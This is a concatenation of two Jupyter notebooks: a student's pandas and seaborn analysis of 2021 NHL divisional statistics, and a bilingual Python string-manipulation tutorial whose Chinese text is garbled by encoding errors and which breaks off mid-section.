- From the ridgeline plot we have some interesting results. When we look at the North divison we can see they that the peak is just before 50 minutes, we also have a dip before this around 40 minutes of time on ice. From the first dip we can see that they are playing less time on 5v5 play, as well as their peak is just before 50 minutes shows that they were playing less disiplined as there was more powerplay and penalty kill time. All other divisions are peaking just after 50 minutes with the density increasing up until their average time on ice. This shows that in other divisional play they were playing more disiplined, taking less penalities, and playing more 5v5 time. This is translated into a divisions overall performance as the more time spent playing 5v5 allows star players to be on the ice and help their team offensively and defensively. The North division was struggling to increase their minutes of 5 on 5 hockey and thus hurting their performance when looking at the divisions.
# Divisional Shooting Percentage (SH%)
```
dfn = kp.North_Div1(dfp)
dfw = kp.West_Div1(dfp)
dfe = kp.East_Div1(dfp)
dfc = kp.Cent_Div1(dfp)
fig, axs = plt.subplots(2, 2, figsize=(10, 10))
sns.histplot(data=dfn, x="SH%", kde=True, color="blue",ax=axs[0, 0]).set(title='North Division')
sns.histplot(data=dfw, x="SH%", kde=True, color="purple",ax=axs[0, 1]).set(title='West Division')
sns.histplot(data=dfe, x="SH%", kde=True, color="red", ax=axs[1, 0]).set(title='East Division')
sns.histplot(data=dfc, x="SH%", kde=True, color="green", ax=axs[1, 1]).set(title='Central Division')
plt.show()
```
# Results:
## Shooting Percentage (SH%) is a measure if a team's shots on goal results in a goal. This is useful as it shows a divisions ability to score, as most goals wins a game.
- When we compare each divisions histogram, we have to look at their SH% and the Count. When looking at the count we are able to see how many times a vaue will appear within our bin size or our values of SH%. We can see that the North Division data has a high count with a relatice low SH% and a decreasing count as SH% incerases above 8-10%. This tells us that the North division was scoring less with each shot on goal but when they did peak their count was around 50. Comparing this to the other divisions we can still see this correlation of count and SH% but the difference is where the peaks are for the other divisions. The other divisions peaks around the same SH% have a much higher count, meaning that over the course of their seasons they were scoring more than the North division. This is a indication that the North division was weaker as not beinng able to score as many goals.
# Divisional PDO (Luck)
```
dfn = kp.North_Div1(dfp)
dfw = kp.West_Div1(dfp)
dfe = kp.East_Div1(dfp)
dfc = kp.Cent_Div1(dfp)
fig, axs = plt.subplots(2, 2, figsize=(10, 10))
sns.histplot(data=dfn, x="PDO", kde=True, color="blue",ax=axs[0, 0]).set(title='North Division')
sns.histplot(data=dfw, x="PDO", kde=True, color="purple",ax=axs[0, 1]).set(title='West Division')
sns.histplot(data=dfe, x="PDO", kde=True, color="red", ax=axs[1, 0]).set(title='East Division')
sns.histplot(data=dfc, x="PDO", kde=True, color="green", ax=axs[1, 1]).set(title='Central Division')
plt.show()
```
# Results:
## PDO is a divisions shooting percentage plus save percentage. When we add these two together it is a statistic that is all luck. (puck luck)
- When compaing the divisions PDO on the histograms we can see the North divisions pdo peaks at 1.0 which we expect but what is interesting is the frequency/count as well as shape around this value. The North division has a almost perfect normal distribution, this shows that they played most games and averaged a 1.0 PDO which is around the average PDO stat. The other divisions taken as a whole however don't all have this uniform shape. The count in these divisions is much higher around the values from 0.9 to 1.1. A PDO below 0.98 indiciated that a division likely better than they appear, but a PDO over 1.02 indicates that a divison is not as good as they seem. This is where the North divisions consistency plays a good role. They are able to play right around that sweet spot of luck, where as the other divisions were bounching back and forth sometimes playing better than they should be and sometimes plaing worse that they should be.
# Final Results:
- From the above analysis we can see that the North Division struggles to play consistently in the stats that matter the most on the outcome of a hockey game. It is very intersting at this season as it will most likely never happen again where no Canadian teams were playing U.S teams in the regular season. The anaylsis shows that the North division struggled to stay out of the penalty box, playing undisiplined, which is a cause for divisions to be better than one another. Also very cool to see that the North division stats were not also the expected shape (probability) compared to the other divsions in teams of CF%, SCF%, but had a almost perfect distribution in the PDO stat. It is enough to say the the North Division was the weakest divison? Yes, but the other divisions are all so drastically close that I wouldnt say they are the worst, I would however say that the games in the North divsion were played sloppy and that their teams need to reevalute some of the basics of what makes a team good. I am excited to make a Tableau Dashboard to showcase my results.
```
#Creating a CSV
AllDiv.to_csv("AllDiv.csv", index=False)
```
|
github_jupyter
|
import pandas as pd
data = pd.read_csv("../data/raw/Games - Natural Stat TrickTeam Season Totals - Natural Stat Trick.csv")
data
import numpy as np
import matplotlib.pylab as plt
import seaborn as sns
print(f"There are {data.shape} rows and columns in the data")
print(f"The columns in the data set are: {data.columns}")
data.describe().T
data.describe(include = 'object').T
hist= data.hist(bins=10, figsize=(10,10))
boxplot = data.boxplot(grid=False, vert=False,fontsize=15)
plt.figure(figsize=(14,12))
sns.heatmap(data.corr(),linewidths=.1,cmap="YlGnBu", annot=True)
plt.yticks(rotation=0);
df = data.drop(columns = ['CF', 'CA' , 'SCF' , 'SCA' , 'Unnamed: 2'])
df
northdiv1 = df.drop(data[data.Team.isin([ "Arizona Coyotes", "Buffalo Sabres", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets",
"Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers",
"Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning",
"St Louis Blues", "Vegas Golden Knights", "New Jersey Devils", "New York Islanders", "New York Rangers", "Philadelphia Flyers",
"Washington Capitals", "Anaheim Ducks"])].index)
northdiv = northdiv1.reset_index()
print(northdiv['Team'].value_counts())
northdiv = northdiv.drop(columns = ['Team', 'index'])
northdiv['Division']='North'
eastdiv1 = df.drop(data[data.Team.isin(["Arizona Coyotes", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche",
"Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "San Jose Sharks",
"Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens","Ottawa Senators",
"Toronto Maple Leafs", "Winnipeg Jets", "Anaheim Ducks", "Vancouver Canucks",])].index)
eastdiv = eastdiv1.reset_index()
print(eastdiv['Team'].value_counts())
eastdiv = eastdiv.drop(columns = ['Team', 'index'])
eastdiv['Division']='East'
centdiv1 = df.drop(data[data.Team.isin(["Arizona Coyotes", "Buffalo Sabres", "Boston Bruins", "Calgary Flames","Colorado Avalanche"
,"Los Angeles Kings", "Minnesota Wild","Pittsburgh Penguins", "San Jose Sharks", "St Louis Blues", "Vegas Golden Knights",
"Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders",
"New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs",
"Winnipeg Jets", "Washington Capitals", "Anaheim Ducks", "Vancouver Canucks"])].index)
centdiv = centdiv1.reset_index()
print(centdiv['Team'].value_counts())
centdiv = centdiv.drop(columns = ['Team', 'index'])
centdiv['Division']='Central'
westdiv1= df.drop(data[data.Team.isin(["Buffalo Sabres", "Boston Bruins", "Carolina Hurricanes",
"Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Dallas Stars", "Detroit Red Wings", "Florida Panthers",
"Nashville Predators", "Pittsburgh Penguins","Tampa Bay Lightning","Edmonton Oilers", "Montreal Canadiens",
"New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators",
"Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals","Vancouver Canucks"])].index)
westdiv= westdiv1.reset_index()
print(westdiv['Team'].value_counts())
westdiv= westdiv.drop(columns = ['Team','index'])
westdiv['Division']='West'
data_frames = [northdiv, centdiv, eastdiv, westdiv]
alldivisions = pd.concat([northdiv, centdiv, eastdiv,westdiv], axis=0)
alldivisions
import project_functions2 as kp
dfp= kp.load_and_process(path_to_csv_file = "../data/raw/Games - Natural Stat TrickTeam Season Totals - Natural Stat Trick.csv")
dfp
NorthDiv = kp.North_Div1(dfp)
CentDiv = kp.Cent_Div1(dfp)
WestDiv = kp.West_Div1(dfp)
EastDiv = kp.East_Div1(dfp)
AllDiv = kp.all_divisions_describe(dfp)
print("Number of rows and columns respectively:", dfp.shape)
print("Columns in the dataset:", dfp.columns)
kp.all_divisions_describe(dfp)
df = kp.all_divisions_describe(dfp)
(sns.violinplot(x="CF%", y="Division", data=df)).set_title("Divisions Corsi %")
sns.set(style="darkgrid")
df = kp.North_Div1(dfp)
df1 = kp.West_Div1(dfp)
df2 = kp.East_Div1(dfp)
df3 = kp.Cent_Div1(dfp)
# Maybe dont do a histogram as it is confusing with all of the bars.
sns.histplot(data=df, x="SCF%", color="red", label="North Div", kde=True)
sns.histplot(data=df1, x="SCF%", color="green", label="West Div", kde=True)
sns.histplot(data=df2, x="SCF%", color="blue", label="East Div", kde=True)
sns.histplot(data=df3, x="SCF%", color="yellow", label="Central Div", kde=True)
plt.title('Divisions SCF%')
plt.legend()
plt.show()
df4 = kp.North_Div1(dfp)
df5 = kp.West_Div1(dfp)
df6 = kp.East_Div1(dfp)
df7 = kp.Cent_Div1(dfp)
sns.kdeplot(data=df4, x="SV%", color = "orange", label="North Div", common_norm=False, alpha=0.9)
sns.kdeplot(data=df5, x="SV%", color = "green", label="West Div", common_norm=False, alpha=0.9)
sns.kdeplot(data=df6, x="SV%", color = "red",label="East Div",common_norm=False, alpha=0.9)
sns.kdeplot(data=df7, x="SV%", color = "blue" ,label="Central Div", common_norm=False, alpha=0.9)
plt.title('Divisions Save Percentage')
plt.legend()
plt.show()
df1 = kp.all_divisions_describe(dfp)
sns.set_theme(style="white", rc={"axes.facecolor": (0, 0, 0, 0), 'axes.linewidth':2})
palette = sns.color_palette("Set2", 12)
g = sns.FacetGrid(df1, palette=palette, row="Division",hue = "Division", aspect=9, height=1.2)
g.map_dataframe(sns.kdeplot, x="TOI", fill=True, alpha=1)
g.map_dataframe(sns.kdeplot, x="TOI", color='black')
def label(x, color, label):
ax = plt.gca()
ax.text(0, .2, label, color='Black', fontsize=13,
ha="left", va="center", transform=ax.transAxes)
g.map(label, "Division")
g.fig.subplots_adjust(hspace=-.5)
g.set_titles("")
g.set(yticks=[], xlabel="Minutes ")
g.despine( left=True)
plt.suptitle('NHL Divisions - TOI', y=0.98)
dfn = kp.North_Div1(dfp)
dfw = kp.West_Div1(dfp)
dfe = kp.East_Div1(dfp)
dfc = kp.Cent_Div1(dfp)
fig, axs = plt.subplots(2, 2, figsize=(10, 10))
sns.histplot(data=dfn, x="SH%", kde=True, color="blue",ax=axs[0, 0]).set(title='North Division')
sns.histplot(data=dfw, x="SH%", kde=True, color="purple",ax=axs[0, 1]).set(title='West Division')
sns.histplot(data=dfe, x="SH%", kde=True, color="red", ax=axs[1, 0]).set(title='East Division')
sns.histplot(data=dfc, x="SH%", kde=True, color="green", ax=axs[1, 1]).set(title='Central Division')
plt.show()
dfn = kp.North_Div1(dfp)
dfw = kp.West_Div1(dfp)
dfe = kp.East_Div1(dfp)
dfc = kp.Cent_Div1(dfp)
fig, axs = plt.subplots(2, 2, figsize=(10, 10))
sns.histplot(data=dfn, x="PDO", kde=True, color="blue",ax=axs[0, 0]).set(title='North Division')
sns.histplot(data=dfw, x="PDO", kde=True, color="purple",ax=axs[0, 1]).set(title='West Division')
sns.histplot(data=dfe, x="PDO", kde=True, color="red", ax=axs[1, 0]).set(title='East Division')
sns.histplot(data=dfc, x="PDO", kde=True, color="green", ax=axs[1, 1]).set(title='Central Division')
plt.show()
#Creating a CSV
AllDiv.to_csv("AllDiv.csv", index=False)
| 0.316053 | 0.936981 |
# String Manipulation and Regular Expressions
# ๅญ็ฌฆไธฒๆไฝๅๆญฃๅ่กจ่พพๅผ
> One place where the Python language really shines is in the manipulation of strings.
This section will cover some of Python's built-in string methods and formatting operations, before moving on to a quick guide to the extremely useful subject of *regular expressions*.
Such string manipulation patterns come up often in the context of data science work, and is one big perk of Python in this context.
Python่ฏญ่จๅฏนไบๅญ็ฌฆไธฒ็ๆไฝๆฏๅ
ถไธๅคงไบฎ็นใๆฌ็ซ ไผ่ฎจ่ฎบPython็ไธไบๅ
งๅปบ็ๅญ็ฌฆไธฒๆไฝๅๆ ผๅผๅๆนๆณใๅจ่ฟไนๅ๏ผๆไปฌไผ็ฎๅ่ฎจ่ฎบไธไธไธไธช้ๅธธๆ็จ็่ฏ้ข*ๆญฃๅ่กจ่พพๅผ*ใ่ฟ็ฑปๅญ็ฌฆไธฒ็ๆไฝ็ปๅธธไผๅจๆฐๆฎ็งๅญฆไธญๅบ็ฐ๏ผๅ ๆญคไนๆฏPythonไธญๅพ้่ฆ็ไธ่ใ
> Strings in Python can be defined using either single or double quotations (they are functionally equivalent):
Pythonไธญ็ๅญ็ฌฆไธฒๅฏไปฅไฝฟ็จๅๅผๅทๆๅๅผๅทๅฎไน๏ผๅฎไปฌ็ๅ่ฝๆฏไธ่ด็๏ผ๏ผ
```
x = 'a string'
y = "a string"
x == y
```
> In addition, it is possible to define multi-line strings using a triple-quote syntax:
้คๆญคไนๅค๏ผ่ฟๅฏไปฅไฝฟ็จ่ฟ็ปญ็ไธไธชๅผๅทๅฎไนๅค่ก็ๅญ็ฌฆไธฒ๏ผ
```
multiline = """
one
two
three
"""
```
> With this, let's take a quick tour of some of Python's string manipulation tools.
ๅฅฝไบ๏ผๆฅไธๆฅๆไปฌๆฅๅฟซ้็็ไธไธPython็ๅญ็ฌฆไธฒๆไฝๅทฅๅ
ทใ
## Simple String Manipulation in Python
## Python็็ฎๅๅญ็ฌฆไธฒๆไฝ
> For basic manipulation of strings, Python's built-in string methods can be extremely convenient.
If you have a background working in C or another low-level language, you will likely find the simplicity of Python's methods extremely refreshing.
We introduced Python's string type and a few of these methods earlier; here we'll dive a bit deeper
ๅฏนไบๅบๆฌ็ๅญ็ฌฆไธฒๆไฝๆฅ่ฏด๏ผPythonๅ
งๅปบ็ๅญ็ฌฆไธฒๆนๆณไฝฟ็จ่ตทๆฅ้ๅธธๆนไพฟใๅฆๆไฝ ๆๅจCๆๅ
ถไปๅบๅฑ่ฏญ่จ็็ผ็จ็ปๅ็่ฏ๏ผไฝ ไผๅ็ฐPython็ๅญ็ฌฆไธฒๆไฝ้ๅธธ็ฎๅใๆไปฌไนๅไป็ปไบPython็ๅญ็ฌฆไธฒ็ฑปๅๅไธไบๆนๆณ๏ผไธ้ขๆไปฌ็จๅพฎๆทฑๅ
ฅ็ไบ่งฃไธไธใ
### Formatting strings: Adjusting case
### ๆ ผๅผๅๅญ็ฌฆไธฒ๏ผ่ฝฌๆขๅคงๅฐๅ
> Python makes it quite easy to adjust the case of a string.
Here we'll look at the ``upper()``, ``lower()``, ``capitalize()``, ``title()``, and ``swapcase()`` methods, using the following messy string as an example:
Pythonๅฏนๅญ็ฌฆไธฒ่ฟ่กๅคงๅฐๅ่ฝฌๆข้ๅธธๅฎนๆใๆไปฌๅฐไผ็ๅฐ`upper()`๏ผ`lower()`๏ผ`capitalize()`๏ผ`title()`ๅ`swapcase()`ๆนๆณ๏ผไธ้ขๆไปฌ็จไธไธชๅคงๅฐๅๆททไนฑ็ๅญ็ฌฆไธฒไฝไธบไพๅญๆฅ่ฏดๆ๏ผ
```
fox = "tHe qUICk bROWn fOx."
```
> To convert the entire string into upper-case or lower-case, you can use the ``upper()`` or ``lower()`` methods respectively:
ๆณ่ฆๅฐๆดไธชๅญ็ฌฆไธฒ่ฝฌไธบๅคงๅๆ่
ๅฐๅ๏ผไฝฟ็จ`upper()`ๆ่
`lower()`ๆนๆณ๏ผ
```
fox.upper()
fox.lower()
```
> A common formatting need is to capitalize just the first letter of each word, or perhaps the first letter of each sentence.
This can be done with the ``title()`` and ``capitalize()`` methods:
่ฟๆไธไธชๅพๅธธ่ง็ๆ ผๅผๅ้ๆฑ๏ผๅฐๆฏไธชๅ่ฏ็้ฆๅญๆฏ็ผ็จๅคงๅ๏ผๆ่
ๆฏไธชๅฅๅญ็้ฆๅญๆฏๅไธบๅคงๅใๅฏไปฅไฝฟ็จ`title()`ๅ`capitalize()`ๆนๆณ๏ผ
```
fox.title()
fox.capitalize()
```
> The cases can be swapped using the ``swapcase()`` method:
ๅฏไปฅไฝฟ็จ`swapcase()`ๆนๆณๅๆขๅคงๅฐๅ๏ผ
```
fox.swapcase()
```
### Formatting strings: Adding and removing spaces
### ๆ ผๅผๅๅญ็ฌฆไธฒ๏ผๅขๅ ๅๅป้ค็ฉบๆ ผ
> Another common need is to remove spaces (or other characters) from the beginning or end of the string.
The basic method of removing characters is the ``strip()`` method, which strips whitespace from the beginning and end of the line:
ๅฆๅคไธไธชๅธธ่ง็้ๆฑๆฏๅจๅญ็ฌฆไธฒๅผๅคดๆ็ปๆไธบๆญขๅป้ค็ฉบๆ ผ๏ผๆ่
ๅ
ถไปๅญ็ฌฆ๏ผใ`strip()`ๆนๆณๅฏไปฅๅป้คๅผๅคดๅ็ปๅฐพ็็ฉบ็ฝใ
```
line = ' this is the content '
line.strip()
```
> To remove just space to the right or left, use ``rstrip()`` or ``lstrip()`` respectively:
ๅฆๆ้่ฆๅป้คๅณ่พนๆ่
ๅทฆ่พน็็ฉบๆ ผ๏ผๅฏไปฅไฝฟ็จ`rstrip()`ๆ`lstrip()`ๆนๆณ๏ผ
```
line.rstrip()
line.lstrip()
```
> To remove characters other than spaces, you can pass the desired character to the ``strip()`` method:
ๆณ่ฆๅป้ค้็ฉบๆ ผ็ๅ
ถไปๅญ็ฌฆ๏ผไฝ ๅฏไปฅๅฐไฝ ๆณ่ฆๅป้ค็ๅญ็ฌฆไฝไธบๅๆฐไผ ็ป`strip()`ๆนๆณ๏ผ
```
num = "000000000000435"
num.strip('0')
```
> The opposite of this operation, adding spaces or other characters, can be accomplished using the ``center()``, ``ljust()``, and ``rjust()`` methods.
ไธstrip็ธๅ็ๆไฝ๏ผๅพๅญ็ฌฆไธฒไธญๅ ๅ
ฅ็ฉบๆ ผๆๅ
ถไปๅญ็ฌฆ๏ผๅฏไปฅไฝฟ็จ`center()`๏ผ`ljust()`๏ผ`rjust()`ๆนๆณใ
> For example, we can use the ``center()`` method to center a given string within a given number of spaces:
ไพๅฆ๏ผๆไปฌๅฏไปฅไฝฟ็จ`center()`ๆนๆณๅจ็ปๅฎ้ฟๅบฆ็็ฉบๆ ผไธญๅฑ
ไธญ๏ผ
```
line = "this is the content"
line.center(30)
```
> Similarly, ``ljust()`` and ``rjust()`` will left-justify or right-justify the string within spaces of a given length:
ๅ็๏ผ`ljust()`ๅ`rjust()`่ฎฉๅญ็ฌฆไธฒๅจ็ปๅฎ้ฟๅบฆ็็ฉบๆ ผไธญๅฑ
ๅทฆๆๅฑ
ๅณ๏ผ
```
line.ljust(30)
line.rjust(30)
```
> All these methods additionally accept any character which will be used to fill the space.
For example:
ไธ่ฟฐ็ๆนๆณ้ฝๅฏไปฅๆฅๆถไธไธช้ขๅค็ๅๆฐ็จๆฅๅไปฃ็ฉบ็ฝๅญ็ฌฆ๏ผไพๅฆ๏ผ
```
'435'.rjust(10, '0')
```
> Because zero-filling is such a common need, Python also provides ``zfill()``, which is a special method to right-pad a string with zeros:
ๅ ไธบ0ๅกซๅ
ไน็ปๅธธ้่ฆ็จๅฐ๏ผๅ ๆญคPythonๆไพไบ`zfill()`ๆนๆณๆฅ็ดๆฅๆไพ0ๅกซๅ
็ๅ่ฝ๏ผ
```
'435'.zfill(10)
```
### Finding and replacing substrings
### ๆฅๆพๅๆฟๆขๅญไธฒ
> If you want to find occurrences of a certain character in a string, the ``find()``/``rfind()``, ``index()``/``rindex()``, and ``replace()`` methods are the best built-in methods.
ๅฆๆไฝ ๆณ่ฆๅจๅญ็ฌฆไธฒไธญๆฅๆพ็นๅฎ็ๅญไธฒ๏ผๅ
งๅปบ็`find()`/`rfind()`๏ผ`index()`/`rindex()`ไปฅๅ`replace()`ๆนๆณๆฏๆๅ้็้ๆฉใ
> ``find()`` and ``index()`` are very similar, in that they search for the first occurrence of a character or substring within a string, and return the index of the substring:
`find()`ๅ`index()`ๆฏ้ๅธธ็ธไผผ็๏ผๅฎไปฌ้ฝๆฏๆฅๆพๅญไธฒๅจๅญ็ฌฆไธฒไธญ็ฌฌไธไธชๅบ็ฐ็ไฝ็ฝฎ๏ผ่ฟๅไฝ็ฝฎ็ๅบๅทๅผ๏ผ
```
line = 'the quick brown fox jumped over a lazy dog'
line.find('fox')
line.index('fox')
```
> The only difference between ``find()`` and ``index()`` is their behavior when the search string is not found; ``find()`` returns ``-1``, while ``index()`` raises a ``ValueError``:
ไธคไธชๆนๆณๅฏไธ็ๅบๅซๅจไบๅฆๆๆพไธๅฐๅญไธฒๆ
ๅตไธ็ๅค็ๆนๅผ๏ผ`find()`ไผ่ฟๅ-1๏ผ่`index()`ไผ็ๆไธไธช`ValueError`ๅผๅธธ๏ผ
```
line.find('bear')
line.index('bear')
```
> The related ``rfind()`` and ``rindex()`` work similarly, except they search for the first occurrence from the end rather than the beginning of the string:
็ธๅบ็`rfind()`ๅ`rindex()`ๆนๆณๅพ็ฑปไผผ๏ผๅบๅซๆฏ่ฟไธคไธชๆนๆณๆฅๆพ็ๆฏๅญไธฒๅจๅญ็ฌฆไธฒไธญๆๅๅบ็ฐ็ไฝ็ฝฎใ
```
line.rfind('a')
```
> For the special case of checking for a substring at the beginning or end of a string, Python provides the ``startswith()`` and ``endswith()`` methods:
ๅฏนไบ้่ฆๆฃๆฅๅญ็ฌฆไธฒๆฏๅฆไปฅๆไธชๅญไธฒๅผๅงๆ่
็ปๆ๏ผPythonๆไพไบ`startswith()`ๅ`endswith()`ๆนๆณ๏ผ
```
line.endswith('dog')
line.startswith('fox')
```
> To go one step further and replace a given substring with a new string, you can use the ``replace()`` method.
Here, let's replace ``'brown'`` with ``'red'``:
่ฆๅฐๅญ็ฌฆไธฒไธญ็ๆไธชๅญไธฒๆฟๆขๆๆฐ็ๅญไธฒ็ๅ
ๅฎน๏ผๅฏไปฅไฝฟ็จ`replace()`ๆนๆณใไธไพไธญๅฐ`'brown'`ๆฟๆขๆ`'red'`๏ผ
```
line.replace('brown', 'red')
```
> The ``replace()`` function returns a new string, and will replace all occurrences of the input:
`replace()`ๆนๆณไผ่ฟๅไธไธชๆฐ็ๅญ็ฌฆไธฒ๏ผๅนถๅฐ้้ขๆๆๆพๅฐ็ๅญไธฒๆฟๆข๏ผ
```
line.replace('o', '--')
```
> For a more flexible approach to this ``replace()`` functionality, see the discussion of regular expressions in [Flexible Pattern Matching with Regular Expressions](#Flexible-Pattern-Matching-with-Regular-Expressions).
ๆณ่ฆๆดๅ ็ตๆดป็ไฝฟ็จ`replace()`ๆนๆณ๏ผๅ่ง[ไฝฟ็จๆญฃๅ่กจ่พพๅผ่ฟ่กๆจกๅผๅน้
](#Flexible-Pattern-Matching-with-Regular-Expressions)ใ
### Splitting and partitioning strings
### ๅๅฒๅญ็ฌฆไธฒ
> If you would like to find a substring *and then* split the string based on its location, the ``partition()`` and/or ``split()`` methods are what you're looking for.
Both will return a sequence of substrings.
ๅฆๆ้่ฆๆฅๆพไธไธชๅญไธฒ*ๅนถไธ*ๆ นๆฎๆพๅฐ็ๅญไธฒ็ไฝ็ฝฎๅฐๅญ็ฌฆไธฒ่ฟ่กๅๅฒ๏ผ`partition()`ๅ/ๆ`split()`ๆนๆณๆญฃๆฏไฝ ๆณ่ฆ็ใ
> The ``partition()`` method returns a tuple with three elements: the substring before the first instance of the split-point, the split-point itself, and the substring after:
`partition()`ๆนๆณ่ฟๅไธไธชๅ
็ด ็ไธไธชๅ
็ป๏ผๆฅๆพ็ๅญไธฒๅ้ข็ๅญไธฒ๏ผๆฅๆพ็ๅญไธฒๆฌ่บซๅๆฅๆพ็ๅญไธฒๅ้ข็ๅญไธฒ๏ผ
```
line.partition('fox')
```
> The ``rpartition()`` method is similar, but searches from the right of the string.
`rpartition()`ๆนๆณ็ฑปไผผ๏ผไธ่ฟๆฏไปๅญ็ฌฆไธฒๅณ่พนๅผๅงๆฅๆพใ
> The ``split()`` method is perhaps more useful; it finds *all* instances of the split-point and returns the substrings in between.
The default is to split on any whitespace, returning a list of the individual words in a string:
`split()`ๆนๆณๅฏ่ฝๆดๅ ๆ็จ๏ผๅฎไผๆฅๆพๆๆๅญไธฒๅบ็ฐ็ไฝ็ฝฎ๏ผ็ถๅ่ฟๅ่ฟไบไฝ็ฝฎไน้ด็ๅ
ๅฎนๅ่กจใ้ป่ฎค็ๅญไธฒไผๆฏไปปไฝ็็ฉบ็ฝๅญ็ฌฆ๏ผ่ฟๅๅญ็ฌฆไธฒไธญๆๆ็ๅ่ฏ๏ผ
```
line.split()
```
> A related method is ``splitlines()``, which splits on newline characters.
Let's do this with a Haiku, popularly attributed to the 17th-century poet Matsuo Bashล:
่ฟๆไธไธช`splitlines()`ๆนๆณ๏ผไผๆ็
งๆข่ก็ฌฆๅๅฒๅญ็ฌฆไธฒใๆไปฌไปฅๆฅๆฌ17ไธ็บช่ฏไบบๆพๅฐพ่ญ่็ไฟณๅฅไธบไพ๏ผ
```
haiku = """matsushima-ya
aah matsushima-ya
matsushima-ya"""
haiku.splitlines()
```
> Note that if you would like to undo a ``split()``, you can use the ``join()`` method, which returns a string built from a splitpoint and an iterable:
ๅฆๆไฝ ้่ฆๆค้`split()`ๆนๆณ๏ผๅฏไปฅไฝฟ็จ`join()`ๆนๆณ๏ผไฝฟ็จไธไธช็นๅฎๅญ็ฌฆไธฒๅฐไธไธช่ฟญไปฃๅจไธฒ่่ตทๆฅ๏ผ
```
'--'.join(['1', '2', '3'])
```
> A common pattern is to use the special character ``"\n"`` (newline) to join together lines that have been previously split, and recover the input:
ไฝฟ็จๆข่ก็ฌฆ`"\n"`ๅฐๅๆๆๅผ็่ฏๅฅ่ฟ่ตทๆฅ๏ผๆขๅคๆๅๆฅ็ๅญ็ฌฆไธฒ๏ผ
```
print("\n".join(['matsushima-ya', 'aah matsushima-ya', 'matsushima-ya']))
```
## Format Strings
## ๆ ผๅผๅๅญ็ฌฆไธฒ
> In the preceding methods, we have learned how to extract values from strings, and to manipulate strings themselves into desired formats.
Another use of string methods is to manipulate string *representations* of values of other types.
Of course, string representations can always be found using the ``str()`` function; for example:
ๅจๅ้ขไป็ป็ๆนๆณไธญ๏ผๆไปฌๅญฆไน ๅฐไบๆๆ ทไปๅญ็ฌฆไธฒไธญๆๅๅผๅๅฆๆๅฐๅญ็ฌฆไธฒๆฌ่บซๆไฝๆ้่ฆ็ๆ ผๅผใๅฏนไบๅญ็ฌฆไธฒๆฅ่ฏด๏ผ่ฟๆไธไธช้่ฆ็้ๆฑ๏ผๅฐฑๆฏๅฐๅ
ถไป็ฑปๅ็ๅผไฝฟ็จๅญ็ฌฆไธฒ*่กจ่พพๅบๆฅ*ใๅฝ็ถ๏ผไฝ ๆปๆฏๅฏไปฅไฝฟ็จ`str()`ๅฝๆฐๅฐๅ
ถไป็ฑปๅ็ๅผ่ฝฌๆขไธบๅญ็ฌฆไธฒ๏ผไพๅฆ๏ผ
```
pi = 3.14159
str(pi)
```
> For more complicated formats, you might be tempted to use string arithmetic as outlined in [Basic Python Semantics: Operators](04-Semantics-Operators.ipynb):
ๅฏนไบๆดๅ ๅคๆ็ๆ ผๅผ๏ผไฝ ๅฏ่ฝ่ฏๅพไฝฟ็จๅจ[Python่ฏญๆณ: ๆไฝ็ฌฆ](04-Semantics-Operators.ipynb)ไป็ป่ฟ็ๅญ็ฌฆไธฒ่ฟ็ฎๆฅๅฎ็ฐ๏ผ
```
"The value of pi is " + str(pi)
```
> A more flexible way to do this is to use *format strings*, which are strings with special markers (noted by curly braces) into which string-formatted values will be inserted.
Here is a basic example:
ไฝๆฏๆไปฌๅไธไธชๆด็ตๆดป็ๆนๅผๆฅๅค็ๆ ผๅผๅ๏ผ้ฃๅฐฑๆฏไฝฟ็จ*ๆ ผๅผๅๅญ็ฌฆไธฒ*๏ผไนๅฐฑๆฏๅจๅญ็ฌฆไธฒไธญๅซๆ็นๆฎ็ๆ ่ฎฐไปฃ่กจๆ ผๅผ๏ผ่ฟไธช็นๆฎๆ ่ฎฐๆ็ๆฏ่ฑๆฌๅท๏ผ๏ผ็ถๅๅฐ้่ฆ่กจ่พพ็ๅผๆๅ
ฅๅฐๅญ็ฌฆไธฒ็็ธๅบไฝ็ฝฎไธใไพๅฆ๏ผ
```
"The value of pi is {}".format(pi)
```
> Inside the ``{}`` marker you can also include information on exactly *what* you would like to appear there.
If you include a number, it will refer to the index of the argument to insert:
ๅจ่ฑๆฌๅท`{}`ไน้ด๏ผไฝ ๅฏไปฅๅ ๅ
ฅ้่ฆ็ไฟกๆฏใไพๅฆไฝ ๅฏไปฅๅจ่ฑๆฌๅทไธญๅ ๅ
ฅๆฐๅญ๏ผ่กจ็คบ่ฏฅไฝ็ฝฎๆๅ
ฅ็ๅๆฐ็ๅบๅท๏ผ
```
"""First letter: {0}. Last letter: {1}.""".format('A', 'Z')
```
> If you include a string, it will refer to the key of any keyword argument:
ๅฆๆไฝ ๅจ่ฑๆฌๅทไธญๅ ๅ
ฅๅญ็ฌฆไธฒ๏ผ่กจ็คบ็ๆฏ่ฏฅไฝ็ฝฎๆๅ
ฅ็ๅ
ณ้ฎๅญๅๆฐ็ๅ็งฐ๏ผ
```
"""First letter: {first}. Last letter: {last}.""".format(last='Z', first='A')
```
> Finally, for numerical inputs, you can include format codes which control how the value is converted to a string.
For example, to print a number as a floating point with three digits after the decimal point, you can use the following:
ๆๅ๏ผๅฏนไบๆฐๅญ่พๅ
ฅ๏ผไฝ ๅฏไปฅๅจ่ฑๆฌๅทไธญๅ ๅ
ฅๆ ผๅผๅ็ไปฃ็ ๆงๅถๆฐๅผ่ฝฌๆขไธบๅญ็ฌฆไธฒ็ๆ ผๅผใไพๅฆ๏ผๅฐไธไธชๆตฎ็นๆฐ่ฝฌๆขไธบๅญ็ฌฆไธฒ๏ผๅนถไธไฟ็ๅฐๆฐ็นๅ3ไฝ๏ผๅฏไปฅ่ฟๆ ทๅ๏ผ
```
